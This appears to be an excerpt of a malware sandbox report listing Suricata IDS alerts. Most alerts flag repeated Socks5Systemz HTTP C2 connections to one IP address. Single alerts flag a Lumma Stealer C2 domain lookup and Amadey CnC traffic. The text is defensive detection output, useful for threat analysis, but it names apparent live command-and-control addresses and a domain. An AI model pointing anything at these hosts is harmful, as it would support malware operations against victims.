Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50332 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50399 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50399 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50378 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50402 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50402 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50362 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50426 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50426 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50341 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50309 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50341 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50326 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50346 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50378 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.4:58328 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50335 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50433 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50309 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50433 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50432 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50413 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50413 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50355 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50396 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50389 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50389 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50437 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50417 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50417 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50276 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50335 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50276 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50432 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50385 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50385 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50317 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50317 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50396 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50351 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50361 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50361 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50465 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50465 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50423 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50423 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50326 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50448 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50429 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50429 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50411 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50351 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50493 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50493 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50437 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50368 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50488 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50488 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50356 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50356 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50470 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50521 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50521 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50374 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50374 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50386 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50386 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50407 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50438 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50438 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50451 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50449 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50496 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50496 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50449 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50479 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50388 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50448 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50407 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50425 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50425 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50451 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50411 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50473 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50529 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50529 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50499 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50470 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50354 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50354 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50388 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50343 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50343 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50545 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50358 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50415 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50459 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50459 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50306 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50306 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50499 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50473 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50545 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50539 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50561 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50392 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50561 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50475 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50415 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50324 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50623 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50422 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50329 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50422 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50430 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50430 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50517 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50517 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50511 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50576 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50454 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50308 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50392 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50441 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50500 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50474 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50474 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50575 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50500 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50377 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50324 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50329 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50580 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50580 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50539 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50338 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50469 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50576 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50511 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50484 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50484 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50522 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50522 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50364 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50461 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50364 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50619 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50514 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50524 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50338 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50524 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50403 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50403 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50308 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50475 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50454 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50441 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50492 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50619 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50492 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50538 -> 185.208.158.202:80
